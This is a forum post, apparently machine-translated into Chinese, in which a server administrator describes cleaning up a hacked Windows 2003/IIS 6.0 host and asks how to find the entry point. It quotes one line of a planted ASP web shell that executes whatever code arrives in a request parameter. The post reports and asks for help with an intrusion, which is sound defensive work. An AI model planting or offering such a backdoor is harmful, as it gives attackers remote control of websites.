1
我的一位客戶在谷歌搜索結果中注意到一條消息,稱他們的網站可能已被黑客入侵。經過一番挖掘,我發現服務器上包含seo垃圾和JavaScript引用的html文件。我刪除這些文件,更改密碼CMS,更新一樣CKFinder等一些部件...我認爲我被黑客入侵併尋求建議
然後我就開始尋找到服務器上的其他網站,發現噸的.asp文件與該行
<%If Request("cmp")<>"" Then Execute(Request("cmp"))%>nofoundfile
我已經刪除了那些,但不知道他們是如何到達那裏的。我已經瀏覽了各種日誌(事件查看器,網站,ftp),但大多數文件創建後的時間不夠長。
我已經更新了操作系統,這隻有一兩個過時的時間,並且改變了ftp訪問。
我還能做些什麼來找到入口點或確保我的服務器和網站安全嗎?
BTW:這是運行IIS 6.0的Windows 2003服務器。
Windows 2003中是「只有一兩個月過時」? – geoffspear
參考Windows更新... – SirM